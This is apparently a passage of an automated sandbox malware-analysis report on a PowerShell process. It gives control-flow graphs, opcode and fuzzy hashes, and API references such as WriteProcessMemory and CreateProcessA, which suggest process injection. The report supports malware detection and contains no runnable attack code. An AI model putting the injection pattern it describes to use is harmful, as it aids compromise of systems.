                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                              • Opcode ID: cd1fd7072c5c3cf706ec22e4292a67e75acda8a7a5b9f46df5428c1e862a3729
                                                                                                                                              • Instruction ID: 149ad26b60a73268e26f91530c460dda56dd37452e29c7069ddff3185e81ea26
                                                                                                                                              • Opcode Fuzzy Hash: cd1fd7072c5c3cf706ec22e4292a67e75acda8a7a5b9f46df5428c1e862a3729
                                                                                                                                              • Instruction Fuzzy Hash: E4B124B1B002099FCB14DF68D4406AEBBE6AFC9350F1488AAED05DF351DB71DD4587A2
                                                                                                                                              Function 07BF328F Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2718 7bf328f-7bf32c0 2720 7bf32c2-7bf32ce 2718->2720 2721 7bf32d0 2718->2721 2722 7bf32d2-7bf32d4 2720->2722 2721->2722 2723 7bf32da-7bf32f9 2722->2723 2724 7bf33a3-7bf33ad 2722->2724 2733 7bf32fb-7bf3307 2723->2733 2734 7bf3309 2723->2734 2725 7bf33af-7bf33b6 2724->2725 2726 7bf33b9-7bf33bf 2724->2726 2727 7bf33c5-7bf33d1 2726->2727 2728 7bf33c1-7bf33c3 2726->2728 2730 7bf33d3-7bf33ef 2727->2730 2728->2730 2736 7bf330b-7bf330d 2733->2736 2734->2736 2736->2724 2737 7bf3313-7bf333d 2736->2737 2741 7bf333f-7bf3345 2737->2741 2742 7bf3355-7bf3361 2737->2742 2743 7bf3349-7bf3353 2741->2743 2744 7bf3347 2741->2744 2742->2724 2747 7bf3363-7bf336a 2742->2747 2743->2742 2744->2742 2748 7bf33f2-7bf3441 2747->2748 2749 7bf3370-7bf3375 2747->2749 2758 7bf3447-7bf344c 2748->2758 2759 7bf35d0-7bf361e 2748->2759 2750 7bf338d-7bf3396 2749->2750 2751 7bf3377-7bf337d 2749->2751 2756 7bf339b-7bf33a0 2750->2756 2753 7bf337f 2751->2753 2754 7bf3381-7bf338b 2751->2754 2753->2750 2754->2750 2760 7bf344e-7bf3454 2758->2760 2761 7bf3464-7bf3468 2758->2761 2767 7bf3787-7bf37b7 2759->2767 2768 7bf3624-7bf3629 2759->2768 2762 7bf3458-7bf3462 2760->2762 2763 7bf3456 2760->2763 2765 7bf346e-7bf3470 2761->2765 2766 7bf3580-7bf358a 2761->2766 2762->2761 2763->2761 2769 7bf3472-7bf347e 2765->2769 2770 7bf3480 2765->2770 2771 7bf358c-7bf3595 2766->2771 2772 7bf3598-7bf359e 2766->2772 2789 7bf37b9-7bf37be 2767->2789 2790 7bf37e1-7bf3813 2767->2790 2774 7bf362b-7bf3631 2768->2774 2775 7bf3641-7bf3645 2768->2775 2776 7bf3482-7bf3484 2769->2776 2770->2776 2777 7bf35a4-7bf35b0 2772->2777 2778 7bf35a0-7bf35a2 2772->2778 2782 7bf3635-7bf363f 2774->2782 2783 7bf3633 2774->2783 2779 7bf364b-7bf364d 2775->2779 2780 7bf3736-7bf3740 2775->2780 2776->2766 2784 7bf348a-7bf34a9 2776->2784 2785 7bf35b2-7bf35cd 2777->2785 2778->2785 2787 7bf364f-7bf365b 2779->2787 2788 7bf365d 2779->2788 2791 7bf374e-7bf3754 2780->2791 2792 7bf3742-7bf374b 2780->2792 2782->2775 2783->2775 2815 7bf34ab-7bf34c6 2784->2815 2816 7bf34c8 2784->2816 2794 7bf365f-7bf3661 2787->2794 2788->2794 2796 7bf37d6-7bf37d8 2789->2796 2797 7bf37c0-7bf37c6 2789->2797 2807 7bf3815-7bf381a 2790->2807 2808 7bf3871-7bf3884 2790->2808 2798 7bf375a-7bf3766 2791->2798 2799 7bf3756-7bf3758 2791->2799 2794->2780 2802 7bf3667-7bf3669 2794->2802 2812 7bf37df-7bf37e0 2796->2812 2803 7bf37ca-7bf37d4 2797->2803 2804 7bf37c8 2797->2804 2805 7bf3768-7bf3784 2798->2805 2799->2805 2809 7bf366b-7bf3677 2802->2809 2810 7bf3679 2802->2810 2803->2796 2804->2796 2817 7bf381c-7bf3822 2807->2817 2818 7bf3832-7bf3838 2807->2818 2830 7bf38be-7bf38d8 2808->2830 2831 7bf3886-7bf38a5 2808->2831 2819 7bf367b-7bf367d 2809->2819 2810->2819 2827 7bf34ca-7bf34cc 2815->2827 2816->2827 2821 7bf3826-7bf3830 2817->2821 2822 7bf3824 2817->2822 2824 7bf383a-7bf3846 2818->2824 2825 7bf3848-7bf384b 2818->2825 2819->2780 2826 7bf3683-7bf3685 2819->2826 2821->2818 2822->2818 2824->2825 2847 7bf3856-7bf386a 2824->2847 2843 7bf3852-7bf3855 2825->2843 2832 7bf369f-7bf3733 2826->2832 2833 7bf3687-7bf368d 2826->2833 2827->2766 2834 7bf34d2-7bf34dc 2827->2834 2849 7bf38da-7bf38ec 2830->2849 2850 7bf3940-7bf3945 2830->2850 2836 7bf38a7-7bf38b3 2831->2836 2837 7bf38b5 2831->2837 2839 7bf368f 2833->2839 2840 7bf3691-7bf369d 2833->2840 2841 7bf34de-7bf34f9 2834->2841 2842 7bf353a-7bf356d 2834->2842 2846 7bf38b7-7bf38b9 2836->2846 2837->2846 2839->2832 2840->2832 2860 7bf34fb-7bf3501 2841->2860 2861 7bf3513-7bf351e 2841->2861 2881 7bf3574-7bf357d 2842->2881 2851 7bf38bb 2846->2851 2852 7bf38f2-7bf38fc 2846->2852 2847->2808 2849->2852 2850->2849 2851->2830 2858 7bf38fe-7bf3902 2852->2858 2859 7bf3905-7bf390b 2852->2859 2866 7bf390d-7bf390f 2859->2866 2867 7bf3911-7bf391d 2859->2867 2863 7bf3505-7bf3511 2860->2863 2864 7bf3503 2860->2864 2874 7bf3536-7bf3538 2861->2874 2875 7bf3520-7bf3526 2861->2875 2863->2861 2864->2861 2870 7bf391f-7bf393d 2866->2870 2867->2870 2874->2881 2878 7bf352a-7bf352c 2875->2878 2879 7bf3528 2875->2879 2878->2874 2879->2874
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q$$^q
                                                                                                                                              • API String ID: 0-355816377
                                                                                                                                              • Opcode ID: 38f8e075c538e0356099f6e734c45b6429f7e82da641c2976b229dc484a7f591
                                                                                                                                              • Instruction ID: 4a5cbcb14663aa5d70d756814a8d4f21974ee4d42e96444ae240b07d979f3544
                                                                                                                                              • Opcode Fuzzy Hash: 38f8e075c538e0356099f6e734c45b6429f7e82da641c2976b229dc484a7f591
                                                                                                                                              • Instruction Fuzzy Hash: D021E7F97042019FFB158A15D851B66BBF5EB81B10F48809ADA05CF2D2DF35D94CC7A2
                                                                                                                                              Function 07BF536D Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2900 7bf536d-7bf5398 2901 7bf539a-7bf53a6 2900->2901 2902 7bf53a8 2900->2902 2903 7bf53aa-7bf53ac 2901->2903 2902->2903 2904 7bf53ae-7bf53b9 2903->2904 2905 7bf5427-7bf5431 2903->2905 2906 7bf53bb-7bf53c1 2904->2906 2907 7bf53d7 2904->2907 2908 7bf543d-7bf5443 2905->2908 2909 7bf5433-7bf543a 2905->2909 2913 7bf53c7-7bf53d3 2906->2913 2914 7bf53c3-7bf53c5 2906->2914 2910 7bf53d9-7bf53e5 2907->2910 2911 7bf5449-7bf5455 2908->2911 2912 7bf5445-7bf5447 2908->2912 2910->2905 2920 7bf53e7-7bf53ee 2910->2920 2915 7bf5457-7bf5473 2911->2915 2912->2915 2916 7bf53d5 2913->2916 2914->2916 2916->2910 2922 7bf5476-7bf547c 2920->2922 2923 7bf53f4-7bf53f9 2920->2923 2931 7bf547e-7bf5481 2922->2931 2932 7bf54a3-7bf54b5 2922->2932 2924 7bf53fb-7bf5401 2923->2924 2925 7bf5411-7bf541a 2923->2925 2927 7bf5405-7bf540f 2924->2927 2928 7bf5403 2924->2928 2930 7bf541f-7bf5424 2925->2930 2927->2925 2928->2925 2934 7bf54b7-7bf54c3 2932->2934 2935 7bf54c5 2932->2935 2936 7bf54c7-7bf54c9 2934->2936 2935->2936 2937 7bf54cb-7bf54d1 2936->2937 2938 7bf5515-7bf551f 2936->2938 2941 7bf54df-7bf54fc 2937->2941 2942 7bf54d3-7bf54d5 2937->2942 2939 7bf552a-7bf5530 2938->2939 2940 7bf5521-7bf5527 2938->2940 2943 7bf5536-7bf5542 2939->2943 2944 7bf5532-7bf5534 2939->2944 2947 7bf54fe-7bf550f 2941->2947 2948 7bf5562-7bf5567 2941->2948 2942->2941 2946 7bf5544-7bf555f 2943->2946 2944->2946 2947->2938 2948->2947
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q$$^q
                                                                                                                                              • API String ID: 0-355816377
                                                                                                                                              • Opcode ID: a150416c5385097a9b14ea8e6b08269d5d0ea93ae6beae84cb1ea7c93ace39c1
                                                                                                                                              • Instruction ID: 84fb74525ae8dfe6081d43f253f58a7cb59fc38fec6efc6c0e6f9e1120e809bc
                                                                                                                                              • Opcode Fuzzy Hash: a150416c5385097a9b14ea8e6b08269d5d0ea93ae6beae84cb1ea7c93ace39c1
                                                                                                                                              • Instruction Fuzzy Hash: 8711EBF5604246CFF7358F08D840A61FB75EF92A11F3980EADA098F646E772D829CB51
                                                                                                                                              Function 07BF6D40 Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2953 7bf6d40-7bf6d52 2954 7bf6e1a-7bf6e24 2953->2954 2955 7bf6d58-7bf6d5f 2953->2955 2956 7bf6e26-7bf6e2f 2954->2956 2957 7bf6e32-7bf6e38 2954->2957 2958 7bf6e6b-7bf6e9d 2955->2958 2959 7bf6d65-7bf6d6a 2955->2959 2960 7bf6e3e-7bf6e4a 2957->2960 2961 7bf6e3a-7bf6e3c 2957->2961 2971 7bf6e9f-7bf6eab 2958->2971 2972 7bf6ead 2958->2972 2962 7bf6d6c-7bf6d72 2959->2962 2963 7bf6d82-7bf6d8b 2959->2963 2967 7bf6e4c-7bf6e68 2960->2967 2961->2967 2968 7bf6d76-7bf6d80 2962->2968 2969 7bf6d74 2962->2969 2964 7bf6d8f-7bf6d9b 2963->2964 2965 7bf6d8d 2963->2965 2970 7bf6d9d-7bf6db3 2964->2970 2965->2970 2968->2963 2969->2963 2970->2958 2982 7bf6db9-7bf6dd9 2970->2982 2977 7bf6eaf-7bf6eb1 2971->2977 2972->2977 2978 7bf6f1f-7bf6f29 2977->2978 2979 7bf6eb3-7bf6ecb 2977->2979 2983 7bf6f2b-7bf6f31 2978->2983 2984 7bf6f34-7bf6f3a 2978->2984 2989 7bf6ecd-7bf6ed3 2979->2989 2990 7bf6ee7 2979->2990 2996 7bf6ddb-7bf6de1 2982->2996 2997 7bf6df3-7bf6dff 2982->2997 2986 7bf6f3c-7bf6f3e 2984->2986 2987 7bf6f40-7bf6f4c 2984->2987 2988 7bf6f4e-7bf6f66 2986->2988 2987->2988 2994 7bf6ed9-7bf6edb 2989->2994 2995 7bf6ed5-7bf6ed7 2989->2995 2993 7bf6ee9 2990->2993 2998 7bf6eeb-7bf6efc 2993->2998 3000 7bf6ee5 2994->3000 2995->3000 3001 7bf6de5-7bf6df1 2996->3001 3002 7bf6de3 2996->3002 3003 7bf6e04-7bf6e17 2997->3003 3007 7bf6efe-7bf6f00 2998->3007 3000->2993 3001->2997 3002->2997 3009 7bf6f02-7bf6f0e 3007->3009 3010 7bf6f10 3007->3010 3011 7bf6f12-7bf6f14 3009->3011 3010->3011 3011->2978 3012 7bf6f16-7bf6f1c 3011->3012
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$tP^q
                                                                                                                                              • API String ID: 0-1785267070
                                                                                                                                              • Opcode ID: 1f18c964bc57abe0c97b980601662cb6ef5e718a688e79c360c8379bbcab62dc
                                                                                                                                              • Instruction ID: 72e0605f2421fc02adcf652be67675d83cb2be94ad43136613041285162cd123
                                                                                                                                              • Opcode Fuzzy Hash: 1f18c964bc57abe0c97b980601662cb6ef5e718a688e79c360c8379bbcab62dc
                                                                                                                                              • Instruction Fuzzy Hash: 8511E6B5A001059BEB248F58C944B6ABBB2EB95F18F18C4AADE045F344C732DC59C7E1
                                                                                                                                              Function 07BF0B50 Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3013 7bf0b50-7bf0b68 3014 7bf0b6a-7bf0b76 3013->3014 3015 7bf0b78 3013->3015 3016 7bf0b7a-7bf0b7c 3014->3016 3015->3016 3017 7bf0b7e-7bf0b89 3016->3017 3018 7bf0bf7-7bf0c01 3016->3018 3019 7bf0b8b-7bf0b91 3017->3019 3020 7bf0ba7 3017->3020 3021 7bf0c0d-7bf0c13 3018->3021 3022 7bf0c03-7bf0c0a 3018->3022 3023 7bf0b97-7bf0ba3 3019->3023 3024 7bf0b93-7bf0b95 3019->3024 3027 7bf0ba9-7bf0bb5 3020->3027 3025 7bf0c19-7bf0c25 3021->3025 3026 7bf0c15-7bf0c17 3021->3026 3028 7bf0ba5 3023->3028 3024->3028 3029 7bf0c27-7bf0c43 3025->3029 3026->3029 3027->3018 3033 7bf0bb7-7bf0bbe 3027->3033 3028->3027 3035 7bf0c46-7bf0c61 3033->3035 3036 7bf0bc4-7bf0bc9 3033->3036 3043 7bf0c18 3035->3043 3044 7bf0c63-7bf0c8a 3035->3044 3038 7bf0bcb-7bf0bd1 3036->3038 3039 7bf0be1-7bf0bea 3036->3039 3041 7bf0bd5-7bf0bdf 3038->3041 3042 7bf0bd3 3038->3042 3103 7bf0bed call 7bf08f8 3039->3103 3104 7bf0bed call 7bf08d7 3039->3104 3105 7bf0bed call 7bf0b50 3039->3105 3041->3039 3042->3039 3043->3025 3047 7bf0ddc-7bf0df5 3044->3047 3048 7bf0c90-7bf0c95 3044->3048 3045 7bf0bef-7bf0bf4 3056 7bf0df7-7bf0e1d 3047->3056 3057 7bf0e53-7bf0e92 3047->3057 3049 7bf0cad-7bf0cb1 3048->3049 3050 7bf0c97-7bf0c9d 3048->3050 3054 7bf0d8e-7bf0d98 3049->3054 3055 7bf0cb7-7bf0cb9 3049->3055 3052 7bf0c9f 3050->3052 3053 7bf0ca1-7bf0cab 3050->3053 3052->3049 3053->3049 3058 7bf0d9a-7bf0da2 3054->3058 3059 7bf0da5-7bf0dab 3054->3059 3060 7bf0cbb-7bf0cc7 3055->3060 3061 7bf0cc9 3055->3061 3063 7bf0e1f-7bf0e2b 3056->3063 3064 7bf0e2d 3056->3064 3065 7bf0dad-7bf0daf 3059->3065 3066 7bf0db1-7bf0dbd 3059->3066 3068 7bf0ccb-7bf0ccd 3060->3068 3061->3068 3070 7bf0e2f-7bf0e31 3063->3070 3064->3070 3071 7bf0dbf-7bf0dce 3065->3071 3066->3071 3068->3054 3069 7bf0cd3-7bf0ceb 3068->3069 3079 7bf0ced-7bf0cf3 3069->3079 3080 7bf0d05-7bf0d0b 3069->3080 3072 7bf0e95-7bf0e9f 3070->3072 3073 7bf0e33-7bf0e51 3070->3073 3084 7bf0dd3-7bf0dd9 3071->3084 3077 7bf0eac-7bf0eb2 3072->3077 3078 7bf0ea1-7bf0ea9 3072->3078 3073->3057 3081 7bf0eb8-7bf0ec4 3077->3081 3082 7bf0eb4-7bf0eb6 3077->3082 3085 7bf0cf7-7bf0d03 3079->3085 3086 7bf0cf5 3079->3086 3088 7bf0d2d-7bf0d32 3080->3088 3089 7bf0d0d-7bf0d25 3080->3089 3087 7bf0ec6-7bf0ee0 3081->3087 3082->3087 3085->3080 3086->3080 3090 7bf0d4a-7bf0d8b 3088->3090 3091 7bf0d34-7bf0d3a 3088->3091 3089->3088 3094 7bf0d3e-7bf0d48 3091->3094 3095 7bf0d3c 3091->3095 3094->3090 3095->3090 3103->3045 3104->3045 3105->3045
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q$$^q
                                                                                                                                              • API String ID: 0-355816377
                                                                                                                                              • Opcode ID: 25b12fa1645534f64c6ee78d27927eacc2bb95e68f49b421a99fa5981f1c8484
                                                                                                                                              • Instruction ID: bdec22c40b8971a2c6d0939234c7b0cd4fed27c8c658fd935a2f72962ff8ecd7
                                                                                                                                              • Opcode Fuzzy Hash: 25b12fa1645534f64c6ee78d27927eacc2bb95e68f49b421a99fa5981f1c8484
                                                                                                                                              • Instruction Fuzzy Hash: 7501A9F5604206DBF7249E45C840F66F7A5EB81A18F18849AFE084B163D731D808C750
                                                                                                                                              Function 07526CE8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3106 7526ce8-7526d1a 3107 7526d20-7526d36 3106->3107 3108 7526dc1-7526e0a 3106->3108 3109 7526d3b-7526d4e 3107->3109 3110 7526d38 3107->3110 3112 7526e50 3108->3112 3113 7526e0c-7526e13 3108->3113 3109->3108 3118 7526d50-7526d5d 3109->3118 3110->3109 3115 7526e53-7526e8f 3112->3115 3116 7526e24 3113->3116 3117 7526e15-7526e22 3113->3117 3127 7526e91-7526e9a 3115->3127 3128 7526f0b-7526f16 3115->3128 3121 7526e26-7526e28 3116->3121 3117->3121 3119 7526d62-7526d74 3118->3119 3120 7526d5f 3118->3120 3119->3108 3132 7526d76-7526d80 3119->3132 3120->3119 3124 7526e2a-7526e2d 3121->3124 3125 7526e2f-7526e31 3121->3125 3129 7526e4e 3124->3129 3130 7526e42 3125->3130 3131 7526e33-7526e40 3125->3131 3127->3128 3135 7526e9c-7526ea2 3127->3135 3133 7526f25-7526f47 3128->3133 3134 7526f18-7526f1b 3128->3134 3129->3115 3136 7526e44-7526e46 3130->3136 3131->3136 3137 7526d82-7526d84 3132->3137 3138 7526d8e-7526dc0 3132->3138 3147 7527008-75270b4 3133->3147 3148 7526f4d-7526f56 3133->3148 3134->3133 3139 7526ea8-7526eb5 3135->3139 3140 752713c-75271a9 3135->3140 3136->3129 3137->3138 3143 7526f02-7526f09 3139->3143 3144 7526eb7-7526ee1 3139->3144 3155 75271ab-75271b7 3140->3155 3156 75271b9-75271f2 WriteProcessMemory 3140->3156 3143->3128 3143->3135 3161 7526ee3-7526ee6 3144->3161 3162 7526efe 3144->3162 3184 75270b6-75270cc 3147->3184 3185 75270ce-75270e1 3147->3185 3148->3140 3150 7526f5c-7526f91 3148->3150 3167 7526f93-7526fa9 3150->3167 3168 7526fab-7526fbe 3150->3168 3155->3156 3159 75271f4-75271fa 3156->3159 3160 75271fb-752720f 3156->3160 3159->3160 3164 7526ef2-7526efb 3161->3164 3165 7526ee8-7526eeb 3161->3165 3162->3143 3165->3164 3170 7526fc0-7526fc7 3167->3170 3168->3170 3171 7526fc9-7526fda 3170->3171 3172 7526fec-7527002 3170->3172 3171->3172 3177 7526fdc-7526fe5 3171->3177 3172->3147 3172->3148 3177->3172 3186 75270e3-75270ea 3184->3186 3185->3186 3187 75270f9-75270fa 3186->3187 3188 75270ec-75270f2 3186->3188 3187->3140 3188->3187
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2719835908.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7520000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d344f095488068bbb018f2119374adda2fee3cf54532a3f4f692a1c34f77886b
                                                                                                                                              • Instruction ID: 3fb228239c4d31f17a86a8d99dccd0d2422b2d3a9b7ea6385fe6b8db0fc47980
                                                                                                                                              • Opcode Fuzzy Hash: d344f095488068bbb018f2119374adda2fee3cf54532a3f4f692a1c34f77886b
                                                                                                                                              • Instruction Fuzzy Hash: 6402F7B5A00219DFCB14CF98D984ADEBBB2FF49310F248559E905AB795C731ED82CB90
                                                                                                                                              Function 07800644 Relevance: 1.7, APIs: 1, Instructions: 203processCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3190 7800644-78006c0 3192 78006c2-78006cc 3190->3192 3193 78006f9-7800719 3190->3193 3192->3193 3194 78006ce-78006d0 3192->3194 3200 7800752-780078c 3193->3200 3201 780071b-7800725 3193->3201 3195 78006d2-78006dc 3194->3195 3196 78006f3-78006f6 3194->3196 3198 78006e0-78006ef 3195->3198 3199 78006de 3195->3199 3196->3193 3198->3198 3202 78006f1 3198->3202 3199->3198 3207 78007c5-780083a CreateProcessA 3200->3207 3208 780078e-7800798 3200->3208 3201->3200 3203 7800727-7800729 3201->3203 3202->3196 3205 780072b-7800735 3203->3205 3206 780074c-780074f 3203->3206 3209 7800737 3205->3209 3210 7800739-7800748 3205->3210 3206->3200 3220 7800843-780088b 3207->3220 3221 780083c-7800842 3207->3221 3208->3207 3211 780079a-780079c 3208->3211 3209->3210 3210->3210 3212 780074a 3210->3212 3213 780079e-78007a8 3211->3213 3214 78007bf-78007c2 3211->3214 3212->3206 3216 78007aa 3213->3216 3217 78007ac-78007bb 3213->3217 3214->3207 3216->3217 3217->3217 3218 78007bd 3217->3218 3218->3214 3226 780089b-780089f 3220->3226 3227 780088d-7800891 3220->3227 3221->3220 3229 78008a1-78008a5 3226->3229 3230 78008af-78008b3 3226->3230 3227->3226 3228 7800893 3227->3228 3228->3226 3229->3230 3231 78008a7 3229->3231 3232 78008c3 3230->3232 3233 78008b5-78008b9 3230->3233 3231->3230 3235 78008c4 3232->3235 3233->3232 3234 78008bb 3233->3234 3234->3232 3235->3235
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0780082A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: 4ada7a496679fd0cbde0b0c0894e43521585db67a1ae2764653db8d9d4a24823
                                                                                                                                              • Instruction ID: c0cd55348b770c4ecc1ad3f1d7aa8e62c93cea9b196d21dd1426d0e232db148d
                                                                                                                                              • Opcode Fuzzy Hash: 4ada7a496679fd0cbde0b0c0894e43521585db67a1ae2764653db8d9d4a24823
                                                                                                                                              • Instruction Fuzzy Hash: 948126B1D002599FDB50CFA9C9857AEBBF2FF48314F148129E858E7284D7759882CF82
                                                                                                                                              Function 07800650 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3236 7800650-78006c0 3238 78006c2-78006cc 3236->3238 3239 78006f9-7800719 3236->3239 3238->3239 3240 78006ce-78006d0 3238->3240 3246 7800752-780078c 3239->3246 3247 780071b-7800725 3239->3247 3241 78006d2-78006dc 3240->3241 3242 78006f3-78006f6 3240->3242 3244 78006e0-78006ef 3241->3244 3245 78006de 3241->3245 3242->3239 3244->3244 3248 78006f1 3244->3248 3245->3244 3253 78007c5-780083a CreateProcessA 3246->3253 3254 780078e-7800798 3246->3254 3247->3246 3249 7800727-7800729 3247->3249 3248->3242 3251 780072b-7800735 3249->3251 3252 780074c-780074f 3249->3252 3255 7800737 3251->3255 3256 7800739-7800748 3251->3256 3252->3246 3266 7800843-780088b 3253->3266 3267 780083c-7800842 3253->3267 3254->3253 3257 780079a-780079c 3254->3257 3255->3256 3256->3256 3258 780074a 3256->3258 3259 780079e-78007a8 3257->3259 3260 78007bf-78007c2 3257->3260 3258->3252 3262 78007aa 3259->3262 3263 78007ac-78007bb 3259->3263 3260->3253 3262->3263 3263->3263 3264 78007bd 3263->3264 3264->3260 3272 780089b-780089f 3266->3272 3273 780088d-7800891 3266->3273 3267->3266 3275 78008a1-78008a5 3272->3275 3276 78008af-78008b3 3272->3276 3273->3272 3274 7800893 3273->3274 3274->3272 3275->3276 3277 78008a7 3275->3277 3278 78008c3 3276->3278 3279 78008b5-78008b9 3276->3279 3277->3276 3281 78008c4 3278->3281 3279->3278 3280 78008bb 3279->3280 3280->3278 3281->3281
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0780082A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: 854800306ef95f3d9ac1359c1192e3da4a6f65a1e5355c6d2a7906623270d2aa
                                                                                                                                              • Instruction ID: ce9fcd936cc85f43ea2419c4fdb090ad439ba705e0c68e003d27ea59e980de77
                                                                                                                                              • Opcode Fuzzy Hash: 854800306ef95f3d9ac1359c1192e3da4a6f65a1e5355c6d2a7906623270d2aa
                                                                                                                                              • Instruction Fuzzy Hash: DF8115B1D006599FDB50CFA9C8857AEBBF2FF48314F148129E859E7284DB759881CF82
                                                                                                                                              Function 077FFC6C Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3282 77ffc6c-77ffc6e 3283 77ffc77-77ffc79 3282->3283 3284 77ffc70-77ffc72 3282->3284 3285 77ffc7b-77ffcd6 3283->3285 3284->3285 3286 77ffc74 3284->3286 3289 77ffd0f-77ffd71 CreateFileA 3285->3289 3290 77ffcd8-77ffce2 3285->3290 3286->3283 3299 77ffd7a-77ffdba 3289->3299 3300 77ffd73-77ffd79 3289->3300 3290->3289 3291 77ffce4-77ffce6 3290->3291 3293 77ffd09-77ffd0c 3291->3293 3294 77ffce8-77ffcf2 3291->3294 3293->3289 3295 77ffcf6-77ffd05 3294->3295 3296 77ffcf4 3294->3296 3295->3295 3298 77ffd07 3295->3298 3296->3295 3298->3293 3305 77ffdbc-77ffdc0 3299->3305 3306 77ffdca 3299->3306 3300->3299 3305->3306 3307 77ffdc2 3305->3307 3308 77ffdcb 3306->3308 3307->3306 3308->3308
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 077FFD61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: 82ab74f73edf27c13b5b8e3d27943f6277117e4f2a60fdd23fe17097984cd03c
                                                                                                                                              • Instruction ID: e207766e90a3d523c486820550417c1caa082011b62c9122559d323a67821fd2
                                                                                                                                              • Opcode Fuzzy Hash: 82ab74f73edf27c13b5b8e3d27943f6277117e4f2a60fdd23fe17097984cd03c
